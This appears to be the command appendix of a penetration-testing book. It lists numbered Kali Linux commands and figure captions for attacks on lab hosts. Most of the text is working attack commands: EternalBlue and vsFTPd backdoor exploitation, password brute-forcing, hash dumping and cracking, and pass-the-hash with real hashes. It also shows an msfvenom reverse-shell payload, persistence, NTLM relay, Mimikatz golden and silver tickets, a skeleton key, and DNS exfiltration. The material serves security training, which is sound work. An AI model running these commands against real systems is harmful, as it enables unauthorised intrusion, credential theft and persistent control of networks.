kali@kali:~$ sudo ifconfig wlan0 down


kali@kali:~$ sudo iwconfig wlan0 mode managed
kali@kali:~$ sudo iwconfig wlan0 up
Command 7.27

kali@kali:~$ sudo airmon-ng check kill


Command 7.28

kali@kali:~$ sudo airmon-ng start wlan0


Command 7.29

kali@kali:~$ sudo aireplay-ng -9 wlan0mon


Command 7.30
kali@kali:~$ sudo airmon-ng stop wlan0mon
Command 7.31

Further reading
To learn more about Airmon-ng, go to https://www.aircrack-ng.org/doku.php?id=airmon-ng.
Chapter 8
Technical requirements
To follow along with the exercises in this chapter, please ensure that you have met the
following hardware and software requirements:
• Kali Linux 2021.2: https://www.kali.org/get-kali/
• Windows 10 as a host operating system
• Metasploitable 2: https://sourceforge.net/projects/metasploitable/files/Metasploitable2/
• Metasploitable 3: https://app.vagrantup.com/rapid7/boxes/metasploitable3-win2k8
• A dedicated hardware-based GPU/graphics card on your attacker computer

Images

Figure 8.1 – Passive host discovery


Figure 8.2 – Actively detecting live systems

Figure 8.3 – Checking NetBIOS information

Figure 8.4 – Identifying open service ports


Figure 8.5 – Profiling a target

Figure 8.6 – Profiling live systems

Figure 8.7 – Checking for RDP on a target


Figure 8.8 – User credentials found

Figure 8.9 – Online password cracking with Hydra

Figure 8.10 – RDP session


Figure 8.11 – Discovering a running service

Figure 8.12 – Researching a vulnerability and its exploits


Figure 8.13 – Searching for modules

Figure 8.14 – Exploiting vsFTPd

Figure 8.15 – Creating a Python-based pseudo-terminal shell

Figure 8.16 – Viewing the shadow file in Linux


Figure 8.17 – Cracking password hashes

Figure 8.18 – Checking the status of the SMB service ports

Figure 8.19 – Searching for EternalBlue exploits


Figure 8.20 – Checking the vulnerability status of a host

Figure 8.21 – Retrieving user accounts


Figure 8.22 – Identifying a hash

Figure 8.23 – Live password cracking

Figure 8.24 – Viewing the recovered passwords


Figure 8.25 – Exploiting SMB using the PsExec payload

Figure 8.26 – Gaining a Windows shell

Figure 8.27 – Viewing remote file shares


Figure 8.28 – Accessing a remote share

Figure 8.29 – Viewing the contents within a remote share


Figure 8.30 – Passing the hash

Figure 8.31 – Passing the hash with Impacket


Figure 8.32 – Passing the hash with FreeRDP

Figure 8.33 – Checking the SSH port's status


Figure 8.34 – Enumerating SSH usernames

Figure 8.35 – Gaining a shell

Figure 8.36 – Interacting with a session


Figure 8.37 – Checking for an open service port

Figure 8.38 – Checking the web application

Figure 8.39 – Checking HTTPS


Figure 8.40 – Searching for WinRM modules

Figure 8.41 – Using the WinRM scanner on Metasploit


Figure 8.42 – Exploiting WinRM

Figure 8.43 – Searching for Elasticsearch modules

Figure 8.44 – Exploiting Elasticsearch


Figure 8.45 – Searching for SNMP enumeration modules

Figure 8.46 – Enumerating SNMP information

Code and Commands


kali@kali:~$ sudo netdiscover -r 172.30.1.0/24
Command 8.1

kali@kali:~$ nmap -sn 172.30.1.0/24
Command 8.2

kali@kali:~$ sudo nbtscan -r 172.30.1.0/24
Command 8.3

kali@kali:~$ nmap 172.30.1.21
Command 8.4

kali@kali:~$ nmap -A 172.30.1.21
Command 8.5

kali@kali:~$ nmap -A 172.30.1.23
Command 8.6

kali@kali:~$ gunzip /usr/share/wordlists/rockyou.txt.gz
Command 8.7

kali@kali:~$ ncrack -v -T 3 -u Administrator -P /usr/share/wordlists/rockyou.txt rdp://172.30.1.21
Command 8.8

kali@kali:~$ hydra -t 4 -l Administrator -P /usr/share/wordlists/rockyou.txt rdp://172.30.1.21
Command 8.9

kali@kali:~$ rdesktop -u Administrator -p vagrant 172.30.1.21 -g 1280x1024
Command 8.10

kali@kali:~$ cewl example.com -m 6 -w output_dictionary_file.txt
Command 8.11

kali@kali:~$ crunch 4 4 0123456789ABC -o output_file.txt
Command 8.12

kali@kali:~$ nmap -A -p 21 172.30.1.23
Command 8.13

kali@kali:~$ msfconsole
Command 8.14

msf6 > search vsftpd
Command 8.15

msf6 > use exploit/unix/ftp/vsftpd_234_backdoor
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS 172.30.1.23
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > exploit
Command 8.16

python -c 'import pty; pty.spawn("/bin/bash")'
Command 8.17

root@metasploitable:/# cat /etc/shadow
Command 8.18

kali@kali:~$ john user_hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt
Command 8.19

kali@kali:~$ nmap -p 136-139,445 172.30.1.21
Command 8.20

kali@kali:~$ msfconsole
Command 8.21

msf6 > search ms17-010
Command 8.22

msf6 > use auxiliary/scanner/smb/smb_ms17_010
msf6 auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS 172.30.1.21
msf6 auxiliary(scanner/smb/smb_ms17_010) > run
Command 8.23

msf6 > use exploit/windows/smb/ms17_010_eternalblue
Command 8.24

msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 172.30.1.21
msf6 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 172.30.1.20
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit
Command 8.25

meterpreter > hashdump
Command 8.26

Username : Security Identifier (SID) : LM hash : NTLM hash
Command 8.27

Administrator:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b
Code 8.1

C:\Users\Slayer\Downloads\hashcat-6.2.3\hashcat-6.2.3> hashcat -m 1000 passwordhashes.txt -a 0 rockyou.txt
Command 8.28

C:\Users\Slayer\Downloads\hashcat-6.2.3\hashcat-6.2.3> hashcat -m 1000 passwordhashes.txt -a 0 rockyou.txt --show
Command 8.29

kali@kali:~$ msfconsole
Command 8.30

msf6 > use exploit/windows/smb/psexec
Command 8.31

msf6 exploit(windows/smb/psexec) > set RHOSTS 172.30.1.21
msf6 exploit(windows/smb/psexec) > set LHOST 172.30.1.20
Command 8.32

msf6 exploit(windows/smb/psexec) > set AutoRunScript post/windows/manage/migrate
Command 8.33

msf6 exploit(windows/smb/psexec) > set SMBUSER Administrator
msf6 exploit(windows/smb/psexec) > set SMBPass vagrant
msf6 exploit(windows/smb/psexec) > exploit
Command 8.34

kali@kali:~$ smbclient -L \\\\172.30.1.21\\ -U Administrator
Command 8.35

kali@kali:~$ smbclient \\\\172.30.1.21\\ADMIN$ -U Administrator
Command 8.36

kali@kali:~$ smbclient \\\\172.30.1.21\\C$ -U Administrator
Command 8.37

smb: \> get jack_of_diamonds.png
smb: \> exit
Command 8.38

kali@kali:~$ pth-winexe -U Administrator%aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b //172.30.1.21 cmd
Command 8.39

kali@kali:~$ impacket-psexec [email protected] -hashes aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b
Command 8.40

kali@kali:~$ xfreerdp /u:Administrator /pth:e02bc503339d51f71d913c245d35b50b /v:172.30.1.21
Command 8.41

kali@kali:~$ nmap -A -p 22 172.30.1.21
Command 8.42

kali@kali:~$ msfconsole
Command 8.43

msf6 > use auxiliary/scanner/ssh/ssh_enumusers
Command 8.44

msf6 auxiliary(scanner/ssh/ssh_enumusers) > set RHOSTS 172.30.1.21
Command 8.45

msf6 auxiliary(scanner/ssh/ssh_enumusers) > set USER_FILE /usr/share/wordlists/metasploit/default_users_for_services_unhash.txt
msf6 auxiliary(scanner/ssh/ssh_enumusers) > run
Command 8.46

msf6 auxiliary(scanner/ssh/ssh_enumusers) > set USER_FILE /usr/share/wordlists/metasploit/default_users_for_services_unhash.txt
msf6 auxiliary(scanner/ssh/ssh_enumusers) > run
Command 8.47

msf6 > use auxiliary/scanner/ssh/ssh_login
msf6 auxiliary(scanner/ssh/ssh_login) > set RHOSTS 172.30.1.21
msf6 auxiliary(scanner/ssh/ssh_login) > set USERNAME Administrator
msf6 auxiliary(scanner/ssh/ssh_login) > set PASSWORD vagrant
msf6 auxiliary(scanner/ssh/ssh_login) > run
Command 8.48

kali@kali:~$ medusa -h 172.30.1.21 -u Administrator -P /usr/share/wordlists/rockyou.txt -M ssh
Command 8.49

ACCOUNT FOUND: [ssh] Host: 172.30.1.21 User: Administrator Password: vagrant [SUCCESS]
Command 8.50

kali@kali:~$ nmap -A -p 5985 172.30.1.21
Command 8.51

msf6 > use auxiliary/scanner/winrm/winrm_cmd
msf6 auxiliary(scanner/winrm/winrm_cmd) > set USERNAME Administrator
msf6 auxiliary(scanner/winrm/winrm_cmd) > set PASSWORD vagrant
msf6 auxiliary(scanner/winrm/winrm_cmd) > set RHOSTS 172.30.1.21
msf6 auxiliary(scanner/winrm/winrm_cmd) > run
Command 8.52

msf6 > use exploit/windows/winrm/winrm_script_exec
msf6 exploit(windows/winrm/winrm_script_exec) > set RHOSTS 172.30.1.21
msf6 exploit(windows/winrm/winrm_script_exec) > set LHOST 172.30.1.20
Command 8.53

msf6 exploit(windows/winrm/winrm_script_exec) > set FORCE_VBS true
Command 8.54

msf6 exploit(windows/winrm/winrm_script_exec) > set USERNAME Administrator
msf6 exploit(windows/winrm/winrm_script_exec) > set PASSWORD vagrant
msf6 exploit(windows/winrm/winrm_script_exec) > exploit
Command 8.55

msf6 > use exploit/multi/elasticsearch/script_mvel_rce
Command 8.56

msf6 exploit(multi/elasticsearch/script_mvel_rce) > set RHOSTS 172.30.1.21
msf6 exploit(multi/elasticsearch/script_mvel_rce) > set LHOST 172.30.1.20
msf6 exploit(multi/elasticsearch/script_mvel_rce) > exploit
Command 8.57

msf6 > use auxiliary/scanner/snmp/snmp_enum
msf6 auxiliary(scanner/snmp/snmp_enum) > set RHOSTS 172.30.1.21
msf6 auxiliary(scanner/snmp/snmp_enum) > run
Command 8.58

Further reading
To learn more about the topics that were covered in this chapter, take a look at the
following resources:
• Watering hole 101: https://www.trendmicro.com/vinfo/us/threat-encyclopedia/web-attack/137/watering-hole-101
• Drive-by Compromise: https://attack.mitre.org/techniques/T1189/
• Credential access: https://attack.mitre.org/tactics/TA0006/


Chapter 9
Images

Figure 9.1 – Lab topology

Figure 9.2 – Retrieving system information

Figure 9.3 – Determining user privileges


Figure 9.4 – Extracting password hashes from the SAM file

Figure 9.5 – Viewing running processes

Figure 9.6 – Migrating processes

Figure 9.7 – Uploading a file


Figure 9.8 – Spawning the Windows native shell

Figure 9.9 – Interacting with the Windows native shell

Figure 9.10 – Downloading files

Figure 9.11 – Performing privilege escalation


Figure 9.12 – Viewing tokens

Figure 9.13 – Observing impersonation tokens

Figure 9.14 – Impersonating another user


Figure 9.15 – Unable to view tokens as the administrator

Figure 9.16 – Escalating privileges

Figure 9.17 – Creating a new user


Figure 9.18 – Backgrounding the Meterpreter session

Figure 9.19 – Launching a persistence payload

Figure 9.20 – Receiving a callback session

Figure 9.21 – Penetration testing lab topology


Figure 9.22 – Viewing the ARP cache

Figure 9.23 – Viewing IP addressing on Interface 11

Figure 9.24 – Discovering additional network adapters


Figure 9.25 – Checking the routing table

Figure 9.26 – Using the autoroute post-exploitation module

Figure 9.27 – Performing a port scan

Figure 9.28 – Clearing logs


Figure 9.29 – Encoding files

Figure 9.30 – Reassembled file

Figure 9.31 – Obtaining a reverse shell


Figure 9.32 – Modifying the system variables

Figure 9.33 – Creating a sensitive file

Figure 9.34 – PacketWhisper main menu


Figure 9.35 – Selecting a transfer mode and ciphers

Figure 9.36 – Previewing the cloaked data

Figure 9.37 – Starting the data exfiltration


Figure 9.38 – Data exfiltration via DNS messages

Figure 9.39 – DNS messages on Wireshark

Figure 9.40 – Extracting a file


Figure 9.41 – Setting the PCAP file

Figure 9.42 – Selecting the operating system

Figure 9.43 – Choosing the cipher

Figure 9.44 – Decoding the cloaked file


Figure 9.45 – Viewing the decloaked file

Figure 9.46 – Normal network communication

Figure 9.47 – Gratuitous ARP messages


Figure 9.48 – MITM attack

Figure 9.49 – MITM attack using Ettercap


Figure 9.50 – Capturing network packets

Figure 9.51 – Windows host ARP cache

Figure 9.52 – Verifying the MAC address of Kali Linux


Code and Commands
kali@kali:~$ sudo msfconsole
msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 172.30.1.21
msf6 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 172.30.1.20
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit
Command 9.1

meterpreter > run post/windows/manage/migrate
Command 9.2

meterpreter > upload /home/kali/vncviewer.exe c:\\
Command 9.3

C:\Windows\system32> cd\
C:\> dir
Command 9.4

meterpreter > download c:\\jack_of_diamonds.png /home/kali/
Command 9.5

meterpreter > use incognito
Command 9.6

meterpreter > list_tokens -u
Command 9.7

meterpreter > impersonate_token VAGRANT-2008R2\\Administrator
Command 9.8

meterpreter > run post/windows/manage/enable_rdp
Command 9.10

msf6 > use exploit/windows/local/persistence
msf6 exploit(windows/local/persistence) > set SESSION 1
msf6 exploit(windows/local/persistence) > set STARTUP SYSTEM
Command 9.11

msf6 exploit(windows/local/persistence) > set LHOST 172.30.1.20
msf6 exploit(windows/local/persistence) > set LPORT 87
msf6 exploit(windows/local/persistence) > exploit
Command 9.12

msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set AutoRunScript post/windows/manage/migrate
msf6 exploit(multi/handler) > set LHOST 172.30.1.20
msf6 exploit(multi/handler) > set LPORT 87
msf6 exploit(multi/handler) > exploit
Command 9.13

meterpreter > run post/multi/manage/autoroute
Command 9.14

msf6 > use auxiliary/scanner/portscan/tcp
msf6 auxiliary(scanner/portscan/tcp) > set RHOSTS 10.11.12.0/24
msf6 auxiliary(scanner/portscan/tcp) > set PORTS 80
msf6 auxiliary(scanner/portscan/tcp) > run
Command 9.15

kali@kali:~$ /usr/bin/exe2hex -x vncviewer.exe
Command 9.16

kali@kali:~$ sudo msfconsole
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set AutoRunScript post/windows/manage/migrate
msf6 exploit(multi/handler) > set LHOST 172.30.1.29
msf6 exploit(multi/handler) > exploit
Command 9.17

kali@kali:~$ python3 -m http.server 8080
Command 9.18

kali@kali:~$ git clone https://github.com/TryCatchHCF/PacketWhisper
kali@kali:~$ wget https://github.com/TryCatchHCF/PacketWhisper/archive/refs/heads/master.zip
Command 9.19

kali@kali:~$ python3 -m http.server 8080
Command 9.20

C:\Users\vagrant> cd C:\Users\vagrant\Downloads\master\PacketWhisper-master
Command 9.21

C:\Users\vagrant\Downloads\master\PacketWhisper-master> python packetWhisper.py
Command 9.22

kali@kali:~$ cd PacketWhisper
kali@kali:~/PacketWhisper$ python packetWhisper.py
Command 9.23

kali@kali:~$ sudo ettercap -i eth1 -T -q -S -M arp:remote /172.30.1.24// /172.30.1.21//
Command 9.24

Further reading
To learn more on the subject, check out the following resources:
• Vulnerabilities in the application and transport layers: https://hub.packtpub.com/vulnerabilities-in-the-application-and-transport-layer-of-the-tcp-ip-stack/
• PTES post-exploitation: http://www.pentest-standard.org/index.php/Post_Exploitation
• MITM attacks: https://www.rapid7.com/fundamentals/man-in-the-middle-attacks/

Chapter 10
Technical requirements
To follow along with the exercises in this chapter, please ensure that you have met the
following hardware and software requirements:
• Kali Linux 2021.2: https://www.kali.org/get-kali/
• Windows Server 2019: https://www.microsoft.com/en-us/evalcenter/evaluate-windows-server-2019
• Windows 10 Enterprise: https://www.microsoft.com/en-us/evalcenter/evaluate-windows-10-enterprise
• hashcat: https://hashcat.net/hashcat/
• PowerView: https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon
• Bloodhound: https://github.com/BloodHoundAD/BloodHound

Images

Figure 10.1 – Domain structure


Figure 10.2 – Forest

Figure 10.3 – Red Team Lab topology

Figure 10.4 – Checking the domain's network status


Figure 10.5 – Downloading the PowerView.ps1 file

Figure 10.6 – Retrieving the current domain's details


Figure 10.7 – Retrieving the Domain Policy

Figure 10.8 – Retrieving the domain controller's details


Figure 10.9 – Retrieving user accounts

Figure 10.10 – Retrieving computer accounts


Figure 10.11 – Retrieving groups on the domain

Figure 10.12 – Retrieving local groups


Figure 10.13 – Retrieving shares

Figure 10.14 – Retrieving forest information


Figure 10.15 – Retrieving the domains of the current forest

Figure 10.16 – Retrieving all global catalogs

Figure 10.17 – Discovering systems with local admin access


Figure 10.18 – Retrieving local administrator accounts

Figure 10.19 – Neo4j login page


Figure 10.20 – Changing the password

Figure 10.21 – Bloodhound login interface

Figure 10.22 – Extracted Active Directory data


Figure 10.23 – Viewing Database Info
Figure 10.24 – Analytics templates
Figure 10.25 – Viewing the Domain Admin's attack paths

Figure 10.26 – Viewing the Domain Admin's attack path


Figure 10.27 – Checking network interfaces

Figure 10.28 – Starting Responder

Figure 10.29 – Performing a UNC path connection


Figure 10.30 – Requesting network credentials

Figure 10.31 – Capturing the user's credentials

Figure 10.32 – Identifying the hash code


Figure 10.33 – Retrieving a user's password

Figure 10.34 – Windows 10 client SMB security status

Figure 10.35 – Windows Server 2019 SMB security status


Figure 10.36 – Modifying the Responder configuration file

Figure 10.37 – Starting Responder

Figure 10.38 – Starting the NTLM Relay attack


Figure 10.39 – Triggering an event

Figure 10.40 – Dumping the SAM database

Figure 10.41 – Triggering an event


Figure 10.42 – Gaining a reverse shell from NTLM Relay

Code and Commands


kali@kali:~$ git clone https://github.com/PowerShellMafia/PowerSploit
kali@kali:~$ cd PowerSploit/Recon
kali@kali:~/PowerSploit/Recon$ python3 -m http.server 8080
Command 10.1

C:\Windows\system32> cd C:\Users\bob.REDTEAMLAB\Downloads
C:\Users\bob.REDTEAMLAB\Downloads> powershell -ExecutionPolicy bypass
Command 10.2

PS C:\Users\bob.REDTEAMLAB\Downloads> . .\PowerView.ps1
Command 10.3

PS C:\Users\bob.REDTEAMLAB\Downloads> Get-NetDomain
Command 10.4

PS C:\Users\bob.REDTEAMLAB\Downloads> Get-DomainSID
S-1-5-21-634716346-3108032190-2057695417
Command 10.5

PS C:\Users\bob.REDTEAMLAB\Downloads> Get-DomainPolicy
Command 10.6

PS C:\Users\bob.REDTEAMLAB\Downloads> Get-NetDomainController
Command 10.7

PS C:\Users\bob.REDTEAMLAB\Downloads> Get-NetUser
Command 10.8

PS C:\Users\bob.REDTEAMLAB\Downloads> Get-NetComputer
Command 10.9

PS C:\Users\bob.REDTEAMLAB\Downloads> Get-NetGroup
Command 10.10

PS C:\Users\bob.REDTEAMLAB\Downloads> Get-NetLocalGroup -ComputerName dc1.redteamlab.local
Command 10.11

PS C:\Users\bob.REDTEAMLAB\Downloads> Invoke-ShareFinder -Verbose
Command 10.12

PS C:\Users\bob.REDTEAMLAB\Downloads> Get-NetGPO
Command 10.13

PS C:\Users\bob.REDTEAMLAB\Downloads> Get-NetForest
Command 10.14

PS C:\Users\bob.REDTEAMLAB\Downloads> Get-NetForestDomain
Command 10.15

PS C:\Users\bob.REDTEAMLAB\Downloads> Get-NetForestCatalog
Command 10.16

PS C:\Users\bob.REDTEAMLAB\Downloads> Find-LocalAdminAccess -Verbose
Command 10.17

PS C:\Users\bob.REDTEAMLAB\Downloads> Invoke-EnumerateLocalAdmin -Verbose
Command 10.18

kali@kali:~$ sudo apt update
kali@kali:~$ sudo apt install bloodhound
Command 10.19

kali@kali:~$ sudo neo4j console
Command 10.20

kali@kali:~$ sudo bloodhound
Command 10.21

C:\Windows\system32> cd C:\Users\bob.REDTEAMLAB\Downloads
C:\Users\bob.REDTEAMLAB\Downloads> powershell -ExecutionPolicy bypass
Command 10.22

PS C:\Users\bob.REDTEAMLAB\Downloads> . .\SharpHound.ps1
Command 10.23

PS C:\Users\bob.REDTEAMLAB\Downloads> Invoke-Bloodhound -CollectionMethod All -Domain redteamlab.local -ZipFileName redteamlab.zip
Command 10.24

kali@kali:~$ sudo responder -I eth2 -rdwv
Command 10.25

C:\WINDOWS\system32> cd C:\Users\Slayer\Downloads\hashcat-6.2.3\hashcat-6.2.3
C:\Users\Slayer\Downloads\hashcat-6.2.3\hashcat-6.2.3> hashcat -m 5600 NTLMv2-hash.txt rockyou.txt -O
Command 10.26

kali@kali:~$ nmap --script smb2-security-mode -p 445 192.168.42.0/24
Command 10.27

kali@kali:~$ sudo cp -R /usr/share/doc/python3-impacket/examples /home/kali/Impacket
Command 10.28

kali@kali:~$ sudo mousepad /etc/responder/Responder.conf
Command 10.29

kali@kali:~$ sudo responder -I eth2 -rdw
Command 10.30

kali@kali:~$ cd Impacket
kali@kali:~/Impacket$ python3 ntlmrelayx.py -t 192.168.42.23 -smb2support
Command 10.31

kali@kali:~$ sudo msfconsole
Command 10.32

msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set AutoRunScript post/windows/manage/migrate
msf6 exploit(multi/handler) > set LHOST 192.168.42.20
msf6 exploit(multi/handler) > set LPORT 4444
msf6 exploit(multi/handler) > exploit
Command 10.33

kali@kali:~$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.42.20 LPORT=4444 -f exe -o payload4.exe -e x86/shikata_ga_nai -i 9
Command 10.34

kali@kali:~$ sudo responder -I eth2 -rdw
Command 10.35

kali@kali:~$ cd Impacket
kali@kali:~/Impacket$ python3 ntlmrelayx.py -t 192.168.42.23 -smb2support -e /home/kali/payload4.exe
Command 10.36
Further reading
To learn more about the topics that were covered in this chapter, visit the following
links:
• Active Directory Domain Services Overview: https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/get-started/virtual-dc/active-directory-domain-services-overview
• PowerView command list: https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon
• Bloodhound documentation: https://bloodhound.readthedocs.io/en/latest/index.html
• LLMNR/NBT-NS Poisoning and SMB Relay: https://attack.mitre.org/techniques/T1557/001/
Chapter 11
Technical requirements
To follow along with the exercises in this chapter, please ensure that you have met the
following hardware and software requirements:
• Kali Linux 2021.2 – https://www.kali.org/get-kali/
• Windows Server 2019 – https://www.microsoft.com/en-us/evalcenter/evaluate-windows-server-2019
• Windows 10 Enterprise – https://www.microsoft.com/en-us/evalcenter/evaluate-windows-10-enterprise
• mitm6 – https://github.com/fox-it/mitm6
• Mimikatz – https://github.com/gentilkiwi/mimikatz/releases

Images

Figure 11.1 – Phase 1


Figure 11.2 – Phase 2

Figure 11.3 – Phase 3


Figure 11.4 – Phase 4


Figure 11.5 – Phase 5

Figure 11.6 – Configuring Certificate Services


Figure 11.7 – Summary of AD CS

Figure 11.8 – Extracting Active Directory contents

Figure 11.9 – Active Directory contents


Figure 11.10 – Taking over the domain

Figure 11.11 – Checking new user account

Figure 11.12 – Lateral movement


Figure 11.13 – Retrieving the SAM database

Figure 11.14 – Passing the hash

Figure 11.15 – Retrieving the LSA secrets

Figure 11.16 – Retrieving the TGS hash


Figure 11.17 – Retrieving the TGS password

Figure 11.18 – Launching Mimikatz


Figure 11.19 – Retrieving domain users' credentials

Figure 11.20 – Domain Administrator user credentials


Figure 11.21 – Retrieving domain users' NTLM hashes

Figure 11.22 – Retrieving the domain SID


Figure 11.23 – Creating a golden ticket

Figure 11.24 – Golden ticket


Figure 11.25 – NTLM hash of users' and computers' accounts

Figure 11.26 – Creating a silver ticket


Figure 11.27 – Silver ticket

Figure 11.28 – Creating a skeleton key


Figure 11.29 – Authenticating using the skeleton key

Code and Commands


kali@kali:~$ git clone https://github.com/fox-it/mitm6
Command 11.1

kali@kali:~$ cd mitm6
kali@kali:~/mitm6$ pip3 install -r requirements.txt
kali@kali:~/mitm6$ sudo python setup.py install
Command 11.2

kali@kali:~/mitm6$ cd mitm6
kali@kali:~/mitm6/mitm6$ python3 mitm6.py -h
Command 11.3

PS C:\Users\Administrator> Install-WindowsFeature -Name AD-Certificate,ADCS-Cert-Authority -Restart
Command 11.4

kali@kali:~$ cd mitm6/mitm6
kali@kali:~/mitm6/mitm6$ sudo python3 mitm6.py -i eth2 -d redteamlab.local
Command 11.5

kali@kali:~$ cd Impacket
kali@kali:~/Impacket$ python3 ntlmrelayx.py -6 -t ldaps://192.168.42.22 -wh wpad.redteamlab.local -l /home/kali/mitm6-loot
Command 11.6

[*] Dumping domain info for first time
[*] Domain info dumped into lootdir!
Command 11.7

kali@kali:~$ ls mitm6-loot
Command 11.8

[*] Authenticating against ldaps://192.168.42.22 as REDTEAMLAB\johndoe SUCCEED
[*] Enumerating relayed user's privileges. This may take a while on large domains
Command 11.9

kali@kali:~$ sudo apt update
kali@kali:~$ sudo apt install crackmapexec
Command 11.10

kali@kali:~$ sudo crackmapexec smb 192.168.42.0/24 -u bob -p Password1 -d redteamlab.local
Command 11.11

kali@kali:~$ sudo crackmapexec smb 192.168.42.0/24 -u bob -p Password1 -d redteamlab.local --sam
Command 11.12

kali@kali:~$ sudo crackmapexec smb 192.168.42.0/24 -u bob -H ead0cc57ddaae50d876b7dd6386fa9c7 --local-auth
Command 11.13

kali@kali:~$ sudo crackmapexec smb 192.168.42.0/24 -u bob -p Password1 -d redteamlab.local --lsa
Command 11.14

kali@kali:~$ cd Impacket
kali@kali:~/Impacket$ python3 GetUserSPNs.py redteamlab.local/bob:Password1 -dc-ip 192.168.42.22 -request
Command 11.15

C:\Users\Slayer\Downloads\hashcat-6.2.3\hashcat-6.2.3> hashcat -m 13100 TGS-hash.txt rockyou.txt -O
Command 11.16

kali@kali:~$ cd Downloads
kali@kali:~/Downloads$ python3 -m http.server 8080
Command 11.17

PS C:\Users\sqladmin> Invoke-WebRequest -Uri http://192.168.42.20:8080/mimikatz_trunk.zip -Outfile 'C:\Users\sqladmin\Downloads\mimikatz_trunk.zip'
Command 11.18

C:\Users\sqladmin> cd C:\Users\sqladmin\Downloads\mimikatz_trunk\x64
C:\Users\sqladmin\Downloads\mimikatz_trunk\x64> mimikatz.exe
mimikatz # privilege::debug
Command 11.19

mimikatz # sekurlsa::logonpasswords
Command 11.20

mimikatz # lsadump::lsa /patch
Command 11.21

C:\Users\sqladmin> cd C:\Users\sqladmin\Downloads\mimikatz_trunk\x64
C:\Users\sqladmin\Downloads\mimikatz_trunk\x64> mimikatz.exe
mimikatz # privilege::debug
Command 11.22

mimikatz # lsadump::lsa /inject /name:krbtgt
Command 11.23

mimikatz # kerberos::golden /user:FakeAdmin /domain:redteamlab.local /sid:S-1-5-21-634716346-3108032190-2057695417 /krbtgt:53456cfa6981cff6455b3f515f04bd46 /id:500
Command 11.24

mimikatz # kerberos::ptt ticket.kirbi
Command 11.25

mimikatz # misc::cmd
Command 11.26

C:\Users\sqladmin> cd C:\Users\sqladmin\Downloads\mimikatz_trunk\x64
C:\Users\sqladmin\Downloads\mimikatz_trunk\x64> mimikatz.exe
mimikatz # privilege::debug
Command 11.27

mimikatz # lsadump::lsa /patch
Command 11.28

mimikatz # kerberos::golden /user:SilverTicket /domain:redteamlab.local /sid:S-1-5-21-634716346-3108032190-2057695417 /rc4:cb7b254f129981ca3ae74d21ef3a9ac4 /id:1234 /target:dc1.redteamlab.local /service:HOST
Command 11.29

mimikatz # kerberos::ptt silver_ticket.kirbi
Command 11.30

mimikatz # misc::cmd
Command 11.31

C:\Users\sqladmin> cd C:\Users\sqladmin\Downloads\mimikatz_trunk\x64
C:\Users\sqladmin\Downloads\mimikatz_trunk\x64> mimikatz.exe
mimikatz # privilege::debug
Command 11.32

mimikatz # privilege::debug
mimikatz # !+
mimikatz # !processprotect /process:lsass.exe /remove
mimikatz # misc::skeleton
mimikatz # !-
Command 11.33

mimikatz # misc::cmd
Command 11.34

C:\Users\sqladmin\Downloads\mimikatz_trunk\x64> powershell
Command 11.35

PS C:\Users\sqladmin\Downloads\mimikatz_trunk\x64> Enter-PSSession -Computername dc1 -credential redteamlab\Administrator
Command 11.36

[dc1]: PS C:\Users\Administrator\Documents>
Command 11.37

Further reading
To learn more about the topics that were covered in this chapter, take a look at the
following resources:
• LLMNR/NBT-NS Poisoning and SMB Relay – https://attack.mitre.org/techniques/T1557/001/
• OS Credential Dumping: LSA Secrets – https://attack.mitre.org/techniques/T1003/004/
• Active Directory Security – https://adsecurity.org/


Chapter 12
Technical requirements
To follow along with the exercises in this chapter, please ensure that you have met the
following hardware and software requirements:
• Kali Linux 2021.2: https://www.kali.org/get-kali/
• Empire: https://github.com/BC-SECURITY/Empire
• Starkiller: https://github.com/BC-SECURITY/Starkiller
• Windows Server 2019: https://www.microsoft.com/en-us/evalcenter/evaluate-windows-server-2019

Images

Figure 12.1 – C2 operations
Figure 12.2 – Empire client-server model
Figure 12.3 – Empire deployment model
Figure 12.4 – Starting the Empire server
Figure 12.5 – Adding a new Empire server
Figure 12.6 – Connecting to a remote Empire server
Figure 12.7 – Empire client user interface
Figure 12.8 – Viewing user accounts
Figure 12.9 – Creating a user account
Figure 12.10 – Disabling a user account
Figure 12.11 – Creating a listener
Figure 12.12 – Viewing listeners
Figure 12.13 – Executing the agent code
Figure 12.14 – Agent creation
Figure 12.15 – Viewing agents
Figure 12.16 – help menu
Figure 12.17 – Collecting information on the target
Figure 12.18 – Checking the agent context
Figure 12.19 – Executing remote commands
Figure 12.20 – Executing Mimikatz
Figure 12.21 – Credentials table
Figure 12.22 – Viewing running processes
Figure 12.23 – Spawning a new agent
Figure 12.24 – Checking for a new agent
Figure 12.25 – Spawning an interactive shell
Figure 12.26 – Starkiller deployment model
Figure 12.27 – Starkiller log-on page
Figure 12.28 – Accessing the Users menu
Figure 12.29 – User accounts
Figure 12.30 – Changing the password
Figure 12.31 – Creating a new user
Figure 12.32 – Viewing modules
Figure 12.33 – Selecting a listener
Figure 12.34 – Creating a listener
Figure 12.35 – Selecting a stager
Figure 12.36 – Creating a stager
Figure 12.37 – Copying payload code
Figure 12.38 – Downloading a payload file
Figure 12.39 – Viewing agents
Figure 12.40 – Executing a module
Figure 12.41 – Viewing real-time module execution
